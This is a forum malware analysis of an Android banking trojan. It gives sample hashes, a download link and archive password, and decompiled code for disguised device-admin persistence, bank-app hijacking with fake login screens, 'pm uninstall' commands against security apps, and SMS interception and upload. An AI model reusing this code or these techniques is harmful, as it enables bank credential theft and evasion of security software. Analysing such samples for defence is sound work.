吾爱破解 - 52pojie.cn

Views: 52125 | Replies: 144
[Mobile Sample Analysis] [Original] Analysis of the Android virus "Bank Bandit" (银行悍匪)

kangkai, posted 2014-2-22 17:10
Forum notice: sample archives uploaded as forum attachments must be protected with an archive password (password: 52pojie); otherwise antivirus products will flag the forum, and the forum reserves the right to delete the attachments and the post at any time.
Sample attachments and URLs in the malware analysis section should be downloaded and opened with caution; they can damage your computer and are provided only for research by security personnel within the bounds of the law. Illegal use is prohibited.
Requests for illegal penetration testing, illegal network attacks, obtaining private data or other illegal content are forbidden; even if the other party is acting illegally, report it to the police.
This post was last edited by kangkai on 2014-3-2 21:24

1. Basic information about the sample

FileName: b5910a432d2b866e1028f31874edb32f.apk

File MD5: b5910a432d2b866e1028f31874edb32f

SHA1: 0CEEB0A29AC4B24E1EFDD0F57ACFC64388CF5AC1

File Size: 829006 bytes

Package: langthing.nend

Download: http://yunpan.cn/Q4qHuRLaNivtd    access code 3a90    archive password: 52pojie

Summary: the sample first disguises itself as a system component so that it cannot be uninstalled; it then tries to uninstall security software; it watches for a list of banking apps; the keywords used to filter intercepted SMS are stored encrypted, which makes analysis harder; and it declares no MAIN/LAUNCHER component, so no icon appears after installation and the user does not notice that an app was installed.


2. Code analysis

AndroidManifest.xml shows that the sample requests a large number of permissions, many of them high-risk: receiving, reading and sending SMS, placing calls, reading the system log, killing other packages, and so on. There is no MAIN/LAUNCHER activity, so the app never gets an icon. (SEND_SMS is declared twice; the duplicate is harmless and simply ignored by the package manager.)

```xml
<manifest android:versionCode="1" android:versionName="1.1" package="langthing.nend"
  xmlns:android="http://schemas.android.com/apk/res/android">
    <uses-permission android:name="android.permission.RECEIVE_SMS" />            <!-- receive SMS -->
    <uses-permission android:name="android.permission.SEND_SMS" />               <!-- send SMS -->
    <uses-permission android:name="android.permission.READ_SMS" />               <!-- read SMS -->
    <uses-permission android:name="android.permission.WRITE_SMS" />              <!-- edit/delete SMS -->
    <uses-permission android:name="android.permission.SEND_SMS" />               <!-- duplicate declaration -->
    <uses-permission android:name="android.permission.READ_CONTACTS" />          <!-- read contacts -->
    <uses-permission android:name="android.permission.WRITE_SETTINGS" />         <!-- modify system settings -->
    <uses-permission android:name="android.permission.READ_LOGS" />              <!-- read the system log -->
    <uses-permission android:name="android.permission.WRITE_CONTACTS" />         <!-- edit contacts -->
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />       <!-- phone state, IMEI, number -->
    <uses-permission android:name="android.permission.CALL_PHONE" />             <!-- place calls -->
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /> <!-- start at boot -->
    <uses-permission android:name="android.permission.GET_TASKS" />              <!-- see the foreground task -->
    <uses-permission android:name="android.permission.RESTART_PACKAGES" />       <!-- kill other apps -->
    <!-- excerpt: the <application> element with the receivers is shown separately below -->
```


The manifest also registers four broadcast receivers, which is how the sample gets control without any user interaction: TReceiver on BOOT_COMPLETED, with priority 2147483647 (Integer.MAX_VALUE) so it runs ahead of other boot receivers; deviceAdminReceiver on DEVICE_ADMIN_ENABLED, the device-administrator callback (guarded by BIND_DEVICE_ADMIN so only the system can invoke it); Alarmreceiver on the custom action arui.alarm.action, presumably fired by its own AlarmManager alarms to keep the service alive; and ShutdownReceiver on ACTION_SHUTDOWN.

```xml
        <receiver android:name=".TReceiver">
            <intent-filter android:priority="2147483647">
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>
        <receiver android:label="@string/app_name" android:name=".deviceAdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin" />
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
            </intent-filter>
        </receiver>
        <receiver android:name=".Alarmreceiver">
            <intent-filter>
                <action android:name="arui.alarm.action" />
            </intent-filter>
        </receiver>
        <receiver android:name=".ShutdownReceiver">
            <intent-filter>
                <action android:name="android.intent.action.ACTION_SHUTDOWN" />
            </intent-filter>
        </receiver>
```
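The manifest indicators above (risky permission set, no launcher activity, maximum-priority boot receiver, device-admin receiver) can be checked mechanically. The following is an added triage script, not code from the post or from the sample; it feeds the two manifest excerpts above, reassembled into one document (the `<application>` wrapper is assumed, the page does not show it), through a parser and reports the findings. In practice you would feed it the AndroidManifest.xml produced by `apktool d`.

```python
# Added example: static triage of a decoded AndroidManifest.xml for the indicators
# this sample shows. SAMPLE_MANIFEST is reassembled from the excerpts in the post;
# the <application> element is assumed.
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A = "{%s}" % ANDROID_NS          # ElementTree spells namespaced attributes as {ns}name

# Permissions whose combination is characteristic of SMS-stealing bankers.
RISKY = {
    "android.permission.RECEIVE_SMS", "android.permission.SEND_SMS",
    "android.permission.READ_SMS", "android.permission.WRITE_SMS",
    "android.permission.CALL_PHONE", "android.permission.READ_LOGS",
    "android.permission.GET_TASKS", "android.permission.RESTART_PACKAGES",
    "android.permission.RECEIVE_BOOT_COMPLETED",
}

SAMPLE_MANIFEST = """<manifest package="langthing.nend" android:versionCode="1" android:versionName="1.1"
  xmlns:android="http://schemas.android.com/apk/res/android">
  <uses-permission android:name="android.permission.RECEIVE_SMS" />
  <uses-permission android:name="android.permission.SEND_SMS" />
  <uses-permission android:name="android.permission.READ_SMS" />
  <uses-permission android:name="android.permission.WRITE_SMS" />
  <uses-permission android:name="android.permission.SEND_SMS" />
  <uses-permission android:name="android.permission.READ_CONTACTS" />
  <uses-permission android:name="android.permission.WRITE_SETTINGS" />
  <uses-permission android:name="android.permission.READ_LOGS" />
  <uses-permission android:name="android.permission.WRITE_CONTACTS" />
  <uses-permission android:name="android.permission.READ_PHONE_STATE" />
  <uses-permission android:name="android.permission.CALL_PHONE" />
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
  <uses-permission android:name="android.permission.GET_TASKS" />
  <uses-permission android:name="android.permission.RESTART_PACKAGES" />
  <application android:label="@string/app_name">
    <receiver android:name=".TReceiver">
      <intent-filter android:priority="2147483647">
        <action android:name="android.intent.action.BOOT_COMPLETED" />
      </intent-filter>
    </receiver>
    <receiver android:name=".deviceAdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
      <meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin" />
      <intent-filter><action android:name="android.app.action.DEVICE_ADMIN_ENABLED" /></intent-filter>
    </receiver>
    <receiver android:name=".Alarmreceiver">
      <intent-filter><action android:name="arui.alarm.action" /></intent-filter>
    </receiver>
    <receiver android:name=".ShutdownReceiver">
      <intent-filter><action android:name="android.intent.action.ACTION_SHUTDOWN" /></intent-filter>
    </receiver>
  </application>
</manifest>"""


def triage_manifest(xml_text):
    """Return a dict of findings for one decoded manifest."""
    root = ET.fromstring(xml_text)
    perms = [e.get(A + "name") for e in root.iter("uses-permission")]
    f = {"package": root.get("package")}
    f["risky_permissions"] = sorted(set(perms) & RISKY)
    f["duplicate_permissions"] = sorted({p for p in perms if perms.count(p) > 1})

    # A visible app has an <activity> whose filter carries MAIN + LAUNCHER.
    f["has_launcher_activity"] = any(
        "android.intent.action.MAIN" in {a.get(A + "name") for a in flt.iter("action")}
        and "android.intent.category.LAUNCHER" in {c.get(A + "name") for c in flt.iter("category")}
        for act in root.iter("activity") for flt in act.iter("intent-filter"))

    # (receiver class, action, filter priority) for every manifest-declared receiver.
    receivers = []
    for r in root.iter("receiver"):
        for flt in r.iter("intent-filter"):
            prio = int(flt.get(A + "priority", "0"))
            for a in flt.iter("action"):
                receivers.append((r.get(A + "name"), a.get(A + "name"), prio))
    f["receivers"] = receivers
    f["boot_receiver_max_priority"] = any(
        act == "android.intent.action.BOOT_COMPLETED" and prio == 2147483647
        for _, act, prio in receivers)
    f["device_admin_receiver"] = any(
        r.get(A + "permission") == "android.permission.BIND_DEVICE_ADMIN"
        for r in root.iter("receiver"))
    return f


def verdict(f):
    """Heuristic: hidden app + SMS access + autostart is the banker pattern seen here."""
    sms = {"android.permission.RECEIVE_SMS", "android.permission.READ_SMS"} & set(f["risky_permissions"])
    return (not f["has_launcher_activity"]) and bool(sms) and f["boot_receiver_max_priority"]


if __name__ == "__main__":
    findings = triage_manifest(SAMPLE_MANIFEST)
    for key, value in findings.items():
        print(f"{key}: {value}")
    print("suspicious:", verdict(findings))
```

One limitation worth knowing before relying on such a scan: it only sees components declared in the manifest. This sample registers its SMS_RECEIVED receiver at runtime in the service's onCreate() (shown later in the post), so that receiver never appears here; pair the manifest check with a string search of classes.dex for "android.provider.Telephony.SMS_RECEIVED".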


The class tree of the malicious code is as follows:

(image: 恶意注入代码的代码树.png, class tree of the malicious code)

Once installed, the program disguises itself as a system component so that it cannot be uninstalled, as shown:

(image: 防卸载.png, the device-administrator prompt)

The disguise code in langthing.nend.main is below. It fires the ADD_DEVICE_ADMIN intent to request device-administrator rights; the ADD_EXPLANATION extra is the text the system dialog shows to the user, and it is set to "------ android ------" so the prompt looks like it comes from Android itself. Once the user taps Activate, the package cannot be uninstalled until the administrator is deactivated in Settings.

```java
private void b()
  {
    Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
    localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.c);   // this.c: ComponentName of deviceAdminReceiver
    localIntent.putExtra("android.app.extra.ADD_EXPLANATION", "------ android ------");  // shown in the system prompt, disguise as a system app
    startActivityForResult(localIntent, 1);
  }
```

When it detects that a bank client has come to the foreground, the service kills the bank process and puts up a high-fidelity phishing screen; look-alike login pages exist for ICBC, Taobao and others. The logic lives in e(), which polls the top task with getRunningTasks(1) (hence the GET_TASKS permission) and works in two stages.

First, if the top activity is one of the malware's own phishing activities (gs, js, jt, tb, dz), it calls restartPackage() on every installed package from a list of 26 bank apps, so that the genuine app cannot be brought back on top of the fake screen. Second, if a targeted bank app is on top (matched by substring: "icbc", "com.chinamworld.main", "bankcomm", "taobao") and the matching row of its local "yh" table still has jilu == 0 (apparently meaning that nothing has been recorded for that bank yet), it kills that package, fires a HOME intent to push the real app into the background, and then starts its own look-alike activity: gs for ICBC (com.icbc), js for CCB (com.chinamworld.main), jt for Bank of Communications (com.bankcomm), tb for Taobao (com.taobao.taobao).

Two caveats for anyone reproducing this on a test device: since API level 8, ActivityManager.restartPackage() is only a wrapper around killBackgroundProcesses(), so it kills the target's background processes rather than a foreground app; and getRunningTasks() was restricted for third-party apps from Android 5.0, which breaks this kind of foreground monitoring on newer devices.

```java
// Decompiled output, lightly commented. p is the static ActivityManager set in onCreate().
private void e()
  {
    ComponentName localComponentName = ((ActivityManager.RunningTaskInfo)p.getRunningTasks(1).get(0)).topActivity;
    ActivityManager localActivityManager = (ActivityManager)getSystemService("activity");
    String str = localComponentName.getClassName();
    // Stage 1: own phishing screen on top -> kill every installed bank app
    if ((str.contains("gs.gs")) || (str.contains("js.js")) || (str.contains("jt.jt")) || (str.contains("tb.tb")) || (str.contains("dz.dz")))
    {
      if (a(getApplicationContext(), "com.icbc"))                      // a(ctx, pkg): installed check
        localActivityManager.restartPackage("com.icbc");
      if (a(getApplicationContext(), "com.chinamworld.main"))
        localActivityManager.restartPackage("com.chinamworld.main");
      if (a(getApplicationContext(), "com.bankcomm"))
        localActivityManager.restartPackage("com.bankcomm");
      if (a(getApplicationContext(), "com.taobao.taobao"))
        localActivityManager.restartPackage("com.taobao.taobao");
      if (a(getApplicationContext(), "com.android.bankabc"))
        localActivityManager.restartPackage("com.android.bankabc");
      if (a(getApplicationContext(), "cmb.pb"))
        localActivityManager.restartPackage("cmb.pb");
      if (a(getApplicationContext(), "com.rytong.bankgdb"))
        localActivityManager.restartPackage("com.rytong.bankgdb");
      if (a(getApplicationContext(), "com.cib.bankcib"))
        localActivityManager.restartPackage("com.cib.bankcib");
      if (a(getApplicationContext(), "com.rytong.bankps"))
        localActivityManager.restartPackage("com.rytong.bankps");
      if (a(getApplicationContext(), "cn.com.njcb.android.mobilebank"))
        localActivityManager.restartPackage("cn.com.njcb.android.mobilebank");
      if (a(getApplicationContext(), "com.ecitic.bank.mobile"))
        localActivityManager.restartPackage("com.ecitic.bank.mobile");
      if (a(getApplicationContext(), "com.cebbank.bankebb"))
        localActivityManager.restartPackage("com.cebbank.bankebb");
      if (a(getApplicationContext(), "cn.com.cmbc.mbank"))
        localActivityManager.restartPackage("cn.com.cmbc.mbank");
      if (a(getApplicationContext(), "cn.com.spdb.mobilebank.per"))
        localActivityManager.restartPackage("cn.com.spdb.mobilebank.per");
      if (a(getApplicationContext(), "com.pingan.pabank.activity"))
        localActivityManager.restartPackage("com.pingan.pabank.activity");
      if (a(getApplicationContext(), "com.gzrcb.mobilebank"))
        localActivityManager.restartPackage("com.gzrcb.mobilebank");
      if (a(getApplicationContext(), "cn.com.cqb.mobilebank.per"))
        localActivityManager.restartPackage("cn.com.cqb.mobilebank.per");
      if (a(getApplicationContext(), "com.chinamworld.bocmbci"))
        localActivityManager.restartPackage("com.chinamworld.bocmbci");
      if (a(getApplicationContext(), "com.rytong.app.bankhx"))
        localActivityManager.restartPackage("com.rytong.app.bankhx");
      if (a(getApplicationContext(), "com.csii.huzhou.mobilebank"))
        localActivityManager.restartPackage("com.csii.huzhou.mobilebank");
      if (a(getApplicationContext(), "cn.com.shbank.mper"))
        localActivityManager.restartPackage("cn.com.shbank.mper");
      if (a(getApplicationContext(), "com.rytong.bankqd"))
        localActivityManager.restartPackage("com.rytong.bankqd");
      if (a(getApplicationContext(), "com.tlbank"))
        localActivityManager.restartPackage("com.tlbank");
      if (a(getApplicationContext(), "com.sookin.scyh"))
        localActivityManager.restartPackage("com.sookin.scyh");
      if (a(getApplicationContext(), "cn.com.hzb.mobilebank.per"))
        localActivityManager.restartPackage("cn.com.hzb.mobilebank.per");
      if (a(getApplicationContext(), "com.chinamworld.klb"))
        localActivityManager.restartPackage("com.chinamworld.klb");
    }
    // Stage 2: a targeted bank app on top and its "yh" row still has jilu == 0
    if (str.contains("icbc"))
    {
      Cursor localCursor27 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "gs" }, null, null, null);
      if ((localCursor27.moveToFirst()) && (localCursor27.getInt(localCursor27.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.icbc");              // kill the bank app
        new Intent("android.intent.action.MAIN");
        Intent localIntent53 = new Intent("android.intent.action.MAIN");
        localIntent53.setFlags(268435456);                            // FLAG_ACTIVITY_NEW_TASK
        localIntent53.addCategory("android.intent.category.HOME");
        startActivity(localIntent53);                                 // go to the home screen
        Intent localIntent54 = new Intent(getApplicationContext(), gs.class);
        localIntent54.setFlags(268435456);
        startActivity(localIntent54);                                 // show the fake ICBC login
      }
    }
    if (str.contains("com.chinamworld.main"))
    {
      Cursor localCursor26 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "js" }, null, null, null);
      if ((localCursor26.moveToFirst()) && (localCursor26.getInt(localCursor26.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.chinamworld.main");
        new Intent("android.intent.action.MAIN");
        Intent localIntent51 = new Intent("android.intent.action.MAIN");
        localIntent51.setFlags(268435456);
        localIntent51.addCategory("android.intent.category.HOME");
        startActivity(localIntent51);
        Intent localIntent52 = new Intent(getApplicationContext(), js.class);
        localIntent52.setFlags(268435456);
        startActivity(localIntent52);
      }
    }
    if (str.contains("bankcomm"))
    {
      Cursor localCursor25 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "jt" }, null, null, null);
      if ((localCursor25.moveToFirst()) && (localCursor25.getInt(localCursor25.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.bankcomm");
        new Intent("android.intent.action.MAIN");
        Intent localIntent49 = new Intent("android.intent.action.MAIN");
        localIntent49.setFlags(268435456);
        localIntent49.addCategory("android.intent.category.HOME");
        startActivity(localIntent49);
        Intent localIntent50 = new Intent(getApplicationContext(), jt.class);
        localIntent50.setFlags(268435456);
        startActivity(localIntent50);
      }
    }
    if (str.contains("taobao"))
    {
      Cursor localCursor24 = c.a("yh", new String[] { "_id", "mc", "jilu" }, "mc=?", new String[] { "tb" }, null, null, null);
      if ((localCursor24.moveToFirst()) && (localCursor24.getInt(localCursor24.getColumnIndex("jilu")) == 0))
      {
        localActivityManager.restartPackage("com.taobao.taobao");
        new Intent("android.intent.action.MAIN");
        Intent localIntent47 = new Intent("android.intent.action.MAIN");
        localIntent47.setFlags(268435456);
        localIntent47.addCategory("android.intent.category.HOME");
        startActivity(localIntent47);
        Intent localIntent48 = new Intent(getApplicationContext(), tb.class);
        localIntent48.setFlags(268435456);
        startActivity(localIntent48);
      }
    }
    // ... (the excerpt on the page ends here)
  }
```
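To make the two-stage behaviour of e() easier to trace, here is an added model of its decision flow in plain Python; this is not the sample's code and not a port of it. It keeps an in-memory SQLite copy of the "yh" table so the gating on the jilu column is visible. The meaning of jilu (0 = not yet recorded), the bank-to-activity mapping and the assumption that the phishing activity sets jilu to 1 after the victim submits the form are inferred from the decompiled code; the kill list is copied from it.

```python
# Added example: model of the decision flow in e(). TARGETS, PHISH_ON_TOP and the
# "yh" schema are inferred from the decompiled code; nothing here talks to Android.
import sqlite3

# (substring e() looks for in the top activity's class name, bank package,
#  look-alike activity it starts, key under which the "yh" table tracks it)
TARGETS = [
    ("icbc", "com.icbc", "gs", "gs"),                               # ICBC
    ("com.chinamworld.main", "com.chinamworld.main", "js", "js"),   # CCB
    ("bankcomm", "com.bankcomm", "jt", "jt"),                       # Bank of Communications
    ("taobao", "com.taobao.taobao", "tb", "tb"),                    # Taobao
]
# Class-name fragments of the sample's own phishing activities.
PHISH_ON_TOP = ("gs.gs", "js.js", "jt.jt", "tb.tb", "dz.dz")
# Packages e() kills (in its order) while a phishing screen is on top.
KILL_LIST = [
    "com.icbc", "com.chinamworld.main", "com.bankcomm", "com.taobao.taobao",
    "com.android.bankabc", "cmb.pb", "com.rytong.bankgdb", "com.cib.bankcib",
    "com.rytong.bankps", "cn.com.njcb.android.mobilebank", "com.ecitic.bank.mobile",
    "com.cebbank.bankebb", "cn.com.cmbc.mbank", "cn.com.spdb.mobilebank.per",
    "com.pingan.pabank.activity", "com.gzrcb.mobilebank", "cn.com.cqb.mobilebank.per",
    "com.chinamworld.bocmbci", "com.rytong.app.bankhx", "com.csii.huzhou.mobilebank",
    "cn.com.shbank.mper", "com.rytong.bankqd", "com.tlbank", "com.sookin.scyh",
    "cn.com.hzb.mobilebank.per", "com.chinamworld.klb",
]


class HijackModel:
    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE yh (_id INTEGER PRIMARY KEY, mc TEXT, jilu INTEGER)")
        self.db.executemany("INSERT INTO yh (mc, jilu) VALUES (?, 0)",
                            [(key,) for key in ("gs", "js", "jt", "tb", "dz")])

    def mark_recorded(self, key):
        """Assumed: what the phishing activity does once the victim has submitted the form."""
        self.db.execute("UPDATE yh SET jilu = 1 WHERE mc = ?", (key,))

    def on_top_activity(self, top_class, installed):
        """Return the actions e() takes for one poll of getRunningTasks(1).

        top_class: class name of the foreground activity
        installed: set of package names present on the device (the a(ctx, pkg) check)
        """
        actions = []
        # Stage 1: our own phishing screen is on top -> kill every installed bank app
        # so the genuine one cannot be brought back over it.
        if any(tag in top_class for tag in PHISH_ON_TOP):
            actions += [("kill", pkg) for pkg in KILL_LIST if pkg in installed]
        # Stage 2: a targeted bank app is on top and nothing recorded for it yet ->
        # kill it, push it home, then start the look-alike login activity.
        for needle, pkg, activity, key in TARGETS:
            if needle in top_class:
                row = self.db.execute("SELECT jilu FROM yh WHERE mc = ?", (key,)).fetchone()
                if row is not None and row[0] == 0:
                    actions += [("kill", pkg), ("start", "HOME"), ("start", activity)]
        return actions


if __name__ == "__main__":
    model = HijackModel()
    print(model.on_top_activity("com.icbc.ui.LoginActivity", {"com.icbc"}))
    model.mark_recorded("gs")
    print(model.on_top_activity("com.icbc.ui.LoginActivity", {"com.icbc"}))   # nothing: already recorded
    print(model.on_top_activity("langthing.nend.gs.gs", {"com.icbc", "com.taobao.taobao"}))
```

The model makes the one-shot nature of the attack explicit: after jilu is set for a bank, the real app is left alone, which keeps the victim from noticing repeated hijacks. Class names used in the calls are constructed for the demonstration.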

It then looks for security software and tries to uninstall it. The decompiler rendered a root check as an odd for loop: g ends up as "Already root" or "NOroot", and that string is later reported back in the "201305:..." beacon in onCreate(). The B array holds pm uninstall commands for 360, Tencent, Kingsoft and Anguanjia products, and D the same package names (presumably for an installed check). Note that pm uninstall of another package only works with root (the commands have to be run through su); without root these commands fail silently.

```java
for (g = "Already root"; ; g = "NOroot")   // decompiler artifact of a root check; g is the result string
   {
     this.C = 5;
     this.E = 5;
     this.B = new String[this.C];
     this.D = new String[this.E];
     this.B[0] = "pm uninstall com.qihoo360.mobilesafe";     // uninstall commands for 360, Tencent, Kingsoft and other security apps
     this.B[1] = "pm uninstall com.tencent.qqpimsecure";
     this.B[2] = "pm uninstall com.ijinshan.mguard";
     this.B[3] = "pm uninstall com.ijinshan.duba";
     this.B[4] = "pm uninstall com.anguanjia.safe";
     this.D[0] = "com.qihoo360.mobilesafe";                   // the same packages, used for an installed check
     this.D[1] = "com.tencent.qqpimsecure";
     this.D[2] = "com.ijinshan.mguard";
     this.D[3] = "com.ijinshan.duba";
     this.D[4] = "com.anguanjia.safe";
     this.s = new o();
```

SMS interception. This is the onChange() of the ContentObserver (class m) that the service registers on content://sms/ in onCreate(), shown further below. The observer fires on every change to the SMS store; because onChange() carries no row, the code re-queries the provider and de-duplicates by _id: server.a holds the last received _id, server.b the last sent _id. In the decompiled output i3 is the _id, i5 the message type (1 = inbox, 2 = sent), str1/str2 the address and body, and the literals "接收"/"发送" are the log labels "received"/"sent". A received message is uploaded together with a device identifier (str5); a sent message triggers sending every text queued in the local "send" table (column sSend). The keyword filter is not visible here because its keywords are stored encrypted. The block is raw decompiler output with jump labels (label760) and does not compile as is.

```java
// Decompiled onChange() of the content://sms/ observer; raw output with goto labels, not compilable as is.
        if (i5 == 1)                                             // type 1: incoming message
          if ((server.f == 0) && (server.a != i3))               // not yet handled (server.a = last received _id)
          {
            server.a(this.a, 1);
            server.b(this.a, i3);                                // remember this _id
            str4 = "接收";                                        // "received"
            server.a(this.a, new o());
            String str5 = server.d(this.a).a(this.a.getApplicationContext());   // device identifier
            server.a(this.a, new n());
            server.g(this.a).a(this.a.getApplicationContext(), str2, str1, str5); // upload body, address, device id
            localStringBuilder.append("[ ");
            localStringBuilder.append(str1 + ", ");
            localStringBuilder.append(i4 + ", ");
            localStringBuilder.append(str2 + ", ");
            localStringBuilder.append(str3 + ", ");
            localStringBuilder.append(str4);
            localStringBuilder.append(" ]\n\n");
            if (!localCursor1.isClosed())
              localCursor1.close();
          }
      }
      while (true)
      {
        localStringBuilder.append("getSmsInPhone has executed!");
        super.onChange(paramBoolean);
        return;
        server.f = 0;
        break;
        if (i5 != 2)                                             // type 2: sent message
          break;
        if (server.b == i3)                                      // server.b = last sent _id
          break label760;
        Cursor localCursor2 = server.c.a("send", null, null, null, null, null, "_id ASC");  // queued outgoing texts
        if (localCursor2.moveToFirst())
        {
          localCursor2.getColumnIndex("_id");
          int i6 = localCursor2.getColumnIndex("sSend");
          do
            server.a(this.a, localCursor2.getString(i6));        // send each queued text
          while (localCursor2.moveToNext());
        }
        localCursor2.close();
        if (server.h(this.a).equals("1"))
        {
          server.a(this.a, new o());
          server.a(this.a, new n());
          String str6 = server.d(this.a).a(this.a.getApplicationContext());
          server.a(this.a, str2 + ";" + str1, str6);             // upload the sent message too
        }
        server.b = i3;
        str4 = "发送";                                            // "sent"
        break;
        localStringBuilder.append("no result!");
      }
    }
    catch (SQLiteException localSQLiteException)
    {
      while (true)
      {
        continue;
        label760: String str4 = "null";
      }
    }
  }
}
```

The key file and service initialisation. The sample ships unhi.db in its assets, copies it into its private files directory on first run (a() and a(String)), and opens it through the SQLiteOpenHelper subclass a; the "yh" and "send" tables queried above live in this database, and the encrypted keyword list presumably does too. The author refers to this file as the key; what its contents decrypt to is not shown on the page. onCreate() is also where the SMS_RECEIVED receiver is registered, at runtime rather than in the manifest, with priority Integer.MAX_VALUE: before Android 4.4 a receiver with the highest priority sees an incoming SMS first and can abortBroadcast() so that the default messaging app never shows it; from 4.4 onward only the default SMS app receives SMS_DELIVER and SMS_RECEIVED can no longer be aborted. The beacon b(...) sends the root status g, the Android version and the device model; its first argument is whatever o.a() returns, which the page does not show.

```java
public void a()
  {
    try
    {
      InputStream localInputStream = getAssets().open("unhi.db");     // the "key" database, shipped in the assets
      FileOutputStream localFileOutputStream = new FileOutputStream(this.q + "unhi.db");
      byte[] arrayOfByte = new byte[1024];
      while (true)
      {
        int i1 = localInputStream.read(arrayOfByte);
        if (i1 <= 0)
        {
          localFileOutputStream.flush();
          localFileOutputStream.close();
          localInputStream.close();
          return;
        }
        localFileOutputStream.write(arrayOfByte, 0, i1);
      }
    }
    catch (Exception localException)
    {
    }
  }

  public void a(String paramString)        // copy unhi.db out of the assets on first run only
  {
    if (!new File(paramString).exists())
      a();
  }

  public void c()
  {
    new l(this).start();
  }

  public IBinder onBind(Intent paramIntent)
  {
    return null;
  }

  public void onCreate()
  {
    this.u = new e();
    // SMS_RECEIVED receiver registered at runtime (it is not in the manifest) with the highest priority
    IntentFilter localIntentFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");
    localIntentFilter.setPriority(2147483647);
    registerReceiver(this.u, localIntentFilter);
    p = (ActivityManager)getSystemService("activity");   // used by e() for getRunningTasks()
    this.F = 0;
    this.j = false;
    // ... (lines omitted on the page; g is set by the root check shown above)
    // beacon: root status, Android version and device model
    b(this.s.a(getApplicationContext()), "201305:" + g + ";ver:" + Build.VERSION.RELEASE + ";Model:" + Build.MODEL);
    this.q = (getApplicationContext().getFilesDir().getAbsolutePath() + "/");
    a(this.q + "unhi.db");
    c = new a(this, getApplicationContext().getFilesDir().getAbsolutePath() + "/unhi.db", null, 1);   // open unhi.db as the SQLite database
    m localm = new m(this, new Handler());
    getContentResolver().registerContentObserver(Uri.parse("content://sms/"), true, localm);   // watch the SMS store
    Intent localIntent = new Intent(getApplicationContext(), log.class);
    localIntent.setFlags(268435456);
    startService(localIntent);
  }
```
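The SMS-stealing mechanism described above (content observer on the SMS store plus de-duplication by _id, with a "send" queue flushed when a sent message appears) is easier to see stripped of the decompiler noise. The following is an added model, not the sample's code: it re-implements that observer logic in Python over constructed provider rows, with the "send" table in an in-memory SQLite database. The assumption that the observer looks at the newest row of the provider is mine; the keyword filter, which the sample keeps encrypted, is not modelled.

```python
# Added example: model of the content://sms/ observer. Provider rows and the C2 side
# are constructed; the newest-row assumption and the "send" schema are inferred.
import sqlite3

TYPE_INBOX, TYPE_SENT = 1, 2     # Telephony.Sms type values for received and sent messages


class SmsObserverModel:
    def __init__(self, send_queue):
        self.last_received_id = -1          # server.a in the decompiled code
        self.last_sent_id = -1              # server.b
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE send (_id INTEGER PRIMARY KEY, sSend TEXT)")
        self.db.executemany("INSERT INTO send (sSend) VALUES (?)", [(s,) for s in send_queue])
        self.uploaded = []                  # (address, body) pairs the operator would receive
        self.sent = []                      # texts sent on the victim's behalf

    def on_change(self, provider_rows):
        """One onChange() call: re-query the SMS store and act on the newest row.

        provider_rows: the current contents of content://sms/ as dicts with
        _id, type, address, body. onChange() itself tells us nothing about
        which row changed, hence the re-query and the last-seen ids.
        """
        if not provider_rows:
            return "no result"
        newest = max(provider_rows, key=lambda r: r["_id"])
        if newest["type"] == TYPE_INBOX and newest["_id"] != self.last_received_id:
            self.last_received_id = newest["_id"]
            self.uploaded.append((newest["address"], newest["body"]))
            return "received"
        if newest["type"] == TYPE_SENT and newest["_id"] != self.last_sent_id:
            # A sent message triggers flushing the queued outgoing texts, oldest first.
            for (text,) in self.db.execute("SELECT sSend FROM send ORDER BY _id ASC"):
                self.sent.append(text)
            self.last_sent_id = newest["_id"]
            return "sent"
        return "no result"


if __name__ == "__main__":
    # Constructed provider contents: one incoming bank code, then one outgoing text.
    rows = [{"_id": 1, "type": TYPE_INBOX, "address": "95588", "body": "code 1234"}]
    obs = SmsObserverModel(["queued text"])
    print(obs.on_change(rows), obs.uploaded)     # received, the code is uploaded
    print(obs.on_change(rows))                   # no result: same _id again
    rows.append({"_id": 2, "type": TYPE_SENT, "address": "10086", "body": "hi"})
    print(obs.on_change(rows), obs.sent)         # sent, queue flushed
```

Two practical consequences follow from this structure. Every write to the SMS store, including the malware's own outgoing texts, re-enters onChange(), which is why the last-seen ids are needed to avoid loops. And because the observer reads the provider rather than the broadcast, it keeps working even on Android versions where a non-default app can no longer abort SMS_RECEIVED; only the hiding of the message from the user is lost.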


(image: 密钥.png, the key file)

3. Summary
This sample tries to uninstall security software, uses encryption to make analysis harder, and hides its user interface so the victim does not notice it. Mobile security problems are clearly getting worse, and the techniques more sophisticated, which raises the bar for analysis.



// Since my knowledge of cryptography is not even at the Hello World level, I was unable to decrypt the related data; my skills are limited.




小king, 2014-2-22 17:18
Supporting this. 360 on the phone is probably just a software-promotion tool anyway...
If you only download from Google Play you should be able to avoid this kind of software, right?

netstyle, 2014-3-14 21:07
This infection method is quite powerful. I wonder whether the OP knows of an Android virus that, when the user opens a bank app or similar, starts a screenshot program in the background (hidden, of course, so it cannot be seen in the app list), takes smart screenshots as the bank password is typed, then perhaps encrypts the captured images and uploads them to some server~ Or is my imagination running wild??

892644330, 2014-2-22 17:21

blmk, 2014-2-22 17:24
Scary, the viruses have levelled up!

2dehen, 2014-3-1 18:15
That is really fierce; I will have to be careful with mobile banking from now on.

社会太现实, 2014-3-1 18:28
OP is awesome!!!!

